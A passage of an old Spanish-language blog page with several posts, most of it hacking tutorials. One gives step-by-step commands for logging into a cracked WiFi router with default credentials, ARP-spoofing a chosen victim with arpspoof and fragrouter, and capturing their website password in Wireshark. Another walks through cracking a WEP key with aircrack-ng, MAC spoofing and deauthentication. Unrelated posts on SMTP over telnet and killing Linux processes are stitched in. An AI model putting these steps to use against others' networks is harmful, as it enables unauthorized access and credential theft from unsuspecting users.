miércoles, 19 de enero de 2011

Despues de hackear un wifi

( Seguro que existen tecnicas mejores... pero esta es la mia...)

Hace un par de notas explique como hakear un wifi con backtrack o linux ( en el enlace http://naciounaidea.blogspot.com/2011/01/crack-wifi.html)
ahora explicare algunas cosillas que hacer una vez lo hemos hackeado...



los pass que petamos eran tipo telefonica clave WEP

a los ruters de telefonica accedemos por la pagina web 192.168.1.1 que es la puerta de enlace por defecto

y el usuario y contraseña por defecto es usu: 1234 y pass: 1234



si damos un vistazo al router ( en mi caso el clasico telefonica) zyxel en el apartado " Maintenance " > DHCP tables

veremos un listado de los ordenadores que estan conectados (puede q algunos no porq esten caducadas las sesiones)

y podemos ver su IP y mac



Desde nuestro linux instalaremos lo siguiente:

sudo apt-get install nmap (el famoso scaner)

sudo apt-get install dsniff (un sniffer)

sudo apt-get install wireshark (sniffer grafico)

sudo apt-get install fragrouter (para devolver el trafico)



utilizaremos una tecnica que se comonce como el man in the middele

(explicacion cutre)

consiste en engañar al router diciendole que nuestro ordenador es el de la victima de modo que su informacion

pasara por el nuestro y podremos ver sus contraseñas



seleccionando victima!

en la tabla del router como decimos puede estar caducadas las victimas por eso es mejor buscarlas en directo

para ello abriremos una consola i utilizaremos NMAP



#sudo nmap -sP 192.168.1.*

(esto hace un scaneo general de la ret)

en mi caso he escogido la 192.168.1.37 como victima



ya no necesitaremos mas datos

en nuestra consola miramos los siguientes datos con un #ifconfig

puerta de enlace ( el router) en telefonica por defecto 192.168.1.1

y nuestra interface en mi caso Wlan0 (si estais por wifi la q tenga buestra ip)





abrimos una consola i utilizamo Dsniff

#sudo arpspoof -i TARJETA_RED -t IP_VICTIMA IP_ROUTER

en mi caso:

sudo arpspoof -i wlan0 -t 192.168.1.37 192.168.1.1

lo dejamos en ejecucion

en otra consola

#sudo fragrouter -i wlan0 -B1



ya esta pasando todo el trafico de la victima por nuestra maquina





para realizar el ejemplo ire a un objetivo concreto el pass de f.com

si hacemos boton derecho ver codigo fuente veremos que la informacion del logeo veremos como el name del parametro es vb_login_password

abrimos Wireshark (en modo root)

en un terminal sudo wireshark.

es muyy simple por defecto la interfaz que tiene la ip damos a start

y filtraremos los paquetes

filter tcp contains login_password

cuando la victima acceda a f.com y se loguee veremos una entrada
http://www.blogger.com/img/blank.gif
boton derecho del raton "Follow tcp steam" y unicamente tenemos q buscar "vb_login_password" comentado anteriormente y tendremos su pass



me da palo seguir ya me lo currare mejor otro dia lo mismo cuelgo imageneres

salu2

(hace falta tener un servidor de correo instalado)

Tecleamos Respuesta del servidor

Telnet al servidor en el puerto 25



HELO nuestro nombre de dominio



MAIL FROM: (ej, tu cuenta de correo)



RCPT TO: (la cuenta de correo del destinatario) 2



DATA Nos indica que podemos enviar la data, luego CRLF punto CRLF al final



Escribimos el mensaje luego punto (ej, escriban un punto en un linea nueva y luego presionamos ENTER) 250



QUIT

crack wifi

(En edicion colgare poco a poco imagenes i realizare aclaraciones)


Subo tutorial viejo pero que funciona porque estoy limpiando el pc xD



Metodo para conocer passwords router ( clave wep la mayoria de los telefonicas WlanXX)

con las tarjetas intel va todo pero muy lento yo he llegado a tardar 5 horas

con mi Conceptronic USB Wifi C54RU chipset atheneos (muy malilla...20 eur hace 2 o 3 años ) en 10 min aprox

como siempre todo depende del trafico de la red si en la red que hackeamos hay ordenadores que generan mucho trafico por wifi (bajando una pelicula, un programa etc) tardaremos mucho menenos...

Bueno si algo me da rabia es que la gente no valla al grano.... no conocereis como funciona pero si seguis los pasos os saldra que es lo importante un saludo:



Con backtrack 4:



arrancamos la distro desde CD (depende el pc..)



User: root

password:toor



// subir interface

abrimos consola

#ifconfig wlanX up (X = normalmente 1)

//Opcional -> bajamos interface para cambiar la direccion mac

#macchanger -r wlan1 (cambia nuestra direccion mac)

// subimos interface

#ifconfig wlan1 up



//--Todo listo empezamos

/----------------------------------------------



airmon-ng start wlan0 (interface mia "wlan0")

airodump-ng mon0 (snifa conxiones)

airodump-ng -c (canal) --bssid (MAC del router) -w nombre mon0





otra terminal




OPCIONAL!!!!

aireplay-ng -0 10 -a (mac router) -c (Mac estacion) mon0 (opcional esto lo que hace es desincronizar la estacion con el router para que al reconectarse tire mas paquetes con contraseña wep)

aireplay-ng -1 0 -o 1 -a (mac router) -h (Mac estacion ) mon0

(mac mia en lugar estacion)

----------------------------------------------------

aireplay-ng -1 0 -o 1 -e ( essid) -b (mac router) -h (Mac estacion ) mon0




aireplay-ng -3 -b (Mac router) -h (mac estacion / mia) mon0




---------------

otra terminal directorio terminal 1



aircrack-ng -b (mac router) nombre-01.cap




Aclaraciones:

Puedes descargar backtrack de su web http://www.backtrack-linux.org/


Si tienes ubuntu y no quieres utilizar Backtrack aircrack se encuentra en los repositos puedes instalarlo con el comando
sudo apt-get install aircrack-ng

Matar Procesos desde Shell Linux

Estoy peleandome desde Putty con un servidor que monte para una associacion de vecinos de mi barrio.
ellos querian un servidor FPT para poder modificar una base de datos en access, pillar fotos, documentos etc... Seguro que hay millones de soluciones buenas pero el caso es que les monte un servidor FTP en un PentiumIII con Ubuntu...
y jolin que comodon me he vuelto con el entorno grafico... ahora lo paso mal hasta para matar un proceso conque meto esta entrada para repasar comandos...

Comando:

kill -9 (id del proceso)

Buscando el proceso:
Metodo1:

Comando:

ps aux

Podremos ver solo el proceso que estamos buscando si hacemos
ps aux | grep (Nombre del proceso)


El ID del proceso se encuentra en la segunda columna (XXXX)
kill -9 (id)
Otra solucion para saber el ID mas rapido es con el comando pgrep. Automaticamente nos lo da. Ejemplo:
pgrep firefox
(id)

Metodo2:
Comando:
killall proceso
Por ejemplo, para matar el proceso del firefox podremos poner
killall firefox

Otra forma sencilla de parar un proceso es ’’’xkill’’’

informacion sacada de:hackacademia

Algo muy util en Linux es que en caso de que algun proceso se quede colgado o querramos parar algo que este ejecutandose, es muy sencillo hacerlo. Para eso utilizaremos el comando ’’’kill’’’. La sintaxis es
kill -9 ID-del-proceso
Para saber la ID del proceso tendremos que verlo en
ps aux
Podremos ver solo el proceso que estamos buscando si hacemos
ps aux | grep proceso
Por ejemplo
anders@hepe-laptop:~$ ps aux | grep firefox
anders 5668 5.9 8.4 227208 86568 ? Sl 00:39 0:45 /usr/lib/firefox-3.0/firefox
anders 6507 0.0 0.0 3836 784 pts/0 R+ 00:52 0:00 grep firefox
El ID del proceso se encuentra en la segunda columna (5668) que nos dice que corresponde con el Firefox. Para matarlo entonces tendriamos que poner
kill -9 5668
Otra solucion para saber el ID mas rapido es con el comando pgrep. Automaticamente nos lo da. Ejemplo:
pgrep firefox
5668

Una forma bastante mas rapida de hacer esto es con el comando ’’’killall’’’. La sintaxis es
killall proceso
Por ejemplo, para matar el proceso del firefox podremos poner
killall firefox

Otra forma sencilla de parar un proceso es ’’’xkill’’’. Como su nombre nos indica, esto sirve para matar solamente lo grafico. Nos muestra una cruz y podremos seleccionar la ventana que querramos matar. Podemos cancelarlo con ESC.


(_Si al webmaster de hackacademia le molesta retirare el post)